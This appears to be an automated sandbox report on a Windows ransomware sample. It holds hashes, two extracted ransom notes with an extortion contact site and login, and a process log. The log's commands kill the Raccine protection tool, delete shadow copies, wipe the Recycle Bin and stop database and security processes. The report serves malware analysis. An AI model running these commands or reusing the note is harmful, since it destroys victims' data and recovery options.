Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
29-10-2021 12:15
General
-
Target
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe
-
Size
109KB
-
MD5
2bd337b8648c7a465a1f94ba4a99c344
-
SHA1
509cb9c71d34ec78c7fa937506758ae9ad0ebdd6
-
SHA256
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120
-
SHA512
d31b87213494f9173d288a971704b384a582a3dd3fd3a7a4dec8f01aef9db3e8e08213fdb8b308db0a1320dbd4b8bcf553b4fbbe3d9a180b8faab432932dc667
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Ransom Note
Hello !!!
Many of your documents, photos, passwords, databases and other files are no longer
available as they were encrypted. You may be looking for a way to
recover your files,
but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it,
theywill also contact me and
I will make the price much more expensive than if you contacted directly).
DONT USE GMAIL.COM TO CONTACT US
!!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!!
!!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!!
Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as
fastall of your data will be back as before encryption.
Send e-mail to this address: [email protected]
Or contact
https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB
You have to pay for decryption in Bitcoins.
ATTENTION !!!
Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with
the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
We also have all your information to
share .It is in your best interest to contact us as soon as possible.
Key Identifier:
HItWILJQBp44XfVDyASs2jcYo5k9VOoVk+/CM2SwTlbKxi4DHiBajTiIQFqgJnguTU430frjMrGeLJ5800C8HuTs/FpMvdx3p/paYx/Ccna2157I2RLjWRpQBTfDAGDl31b5m1oqr+WUzs2zUIqnDXrHUptpFTVZVv9pWI4p/BcKLG9GmLh36796ml7EXyOIXdlvRfTOvDSu82M19WImKrUsyGWOf41hH2FTOkc0PuRKcRU/UGfOyE+OOImQb7gwgTQjpIJUm0noIKPkL089FfF+TyI1bmitMyoODPnJkyDtLtiUR9TD3sPGlYuBlCaiE1v2J2svBojySh9370w7L3I8kYiye1wbb8n7nG+WEOzR6puQhn5Yf+W3ZbQUZEc58tDHtqPM9waPr0t8JDx5hAwiz15DWp3EMFT7Ya3D8l+lcETMbe+74mmcNpGq2bWfcRRtTRIVpj1rnsLRSrXWISTPelMXsXGBbgSBUEiMSYyXH1WIzZPqphErzsQzfDwGRemtr/LBWPSk99DeyEIRcQW48jPqpjyfzCjWBRbVt1+UOGzPTrsN91jyJDKROr9AOWxRsPiCtFeizJFEjeVEIUiqmK+cAabxZg/WVE+Si8yhCa9nNNsKIcBZO0r3iINMyTd9nKtKFJiZXoST9XT5vUmgQy7XwaVPWz9DVuV3Pak=
Emails
URLs
https://supportdatarecovery.cc/users.php
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Ransom Note
Hello !!!
Many of your documents, photos, passwords, databases and other files are no longer
available as they were encrypted. You may be looking for a way to recover your files,
but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it, theywill also contact me and
I will make the price much more expensive than if you contacted directly).
DONT USE GMAIL.COM TO CONTACT US
!!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!!
!!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!!
Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as fastall of your data will be back as before encryption.
Send e-mail to this address: [email protected]
Or contact https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB
You have to pay for decryption in Bitcoins.
ATTENTION !!!
Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
We also have all your information to share .It is in your best interest to contact us as soon as possible.
Key Identifier: HItWILJQBp44XfVDyASs2jcYo5k9VOoVk+/CM2SwTlbKxi4DHiBajTiIQFqgJnguTU430frjMrGeLJ5800C8HuTs/FpMvdx3p/paYx/Ccna2157I2RLjWRpQBTfDAGDl31b5m1oqr+WUzs2zUIqnDXrHUptpFTVZVv9pWI4p/BcKLG9GmLh36796ml7EXyOIXdlvRfTOvDSu82M19WImKrUsyGWOf41hH2FTOkc0PuRKcRU/UGfOyE+OOImQb7gwgTQjpIJUm0noIKPkL089FfF+TyI1bmitMyoODPnJkyDtLtiUR9TD3sPGlYuBlCaiE1v2J2svBojySh9370w7L3I8kYiye1wbb8n7nG+WEOzR6puQhn5Yf+W3ZbQUZEc58tDHtqPM9waPr0t8JDx5hAwiz15DWp3EMFT7Ya3D8l+lcETMbe+74mmcNpGq2bWfcRRtTRIVpj1rnsLRSrXWISTPelMXsXGBbgSBUEiMSYyXH1WIzZPqphErzsQzfDwGRemtr/LBWPSk99DeyEIRcQW48jPqpjyfzCjWBRbVt1+UOGzPTrsN91jyJDKROr9AOWxRsPiCtFeizJFEjeVEIUiqmK+cAabxZg/WVE+Si8yhCa9nNNsKIcBZO0r3iINMyTd9nKtKFJiZXoST9XT5vUmgQy7XwaVPWz9DVuV3Pak=
Emails
URLs
https://supportdatarecovery.cc/users.php
Signatures
-
Disables Task Manager via registry modification
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Drops desktop.ini file(s) 6 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 28 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 20 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe"C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9252ffc7a7afbe05122c40bdd3f4b9a8
SHA16396dcdcdf77edf598cd1c38a1f53bb7ae429d68
SHA256f81f447cb816afef712cb68b4de4652113b30d8a91afe55cfa54cca3e06edbe2
SHA51233e03493bdda75100a6a2c9d5023d663a5efb82b78f7d1a5794a059671f603e230b748285c9f0504b5c07bda40a120a42ac30baacf9bb937687875ff50a91f57
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
8KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
12.3MB
-
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
8KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-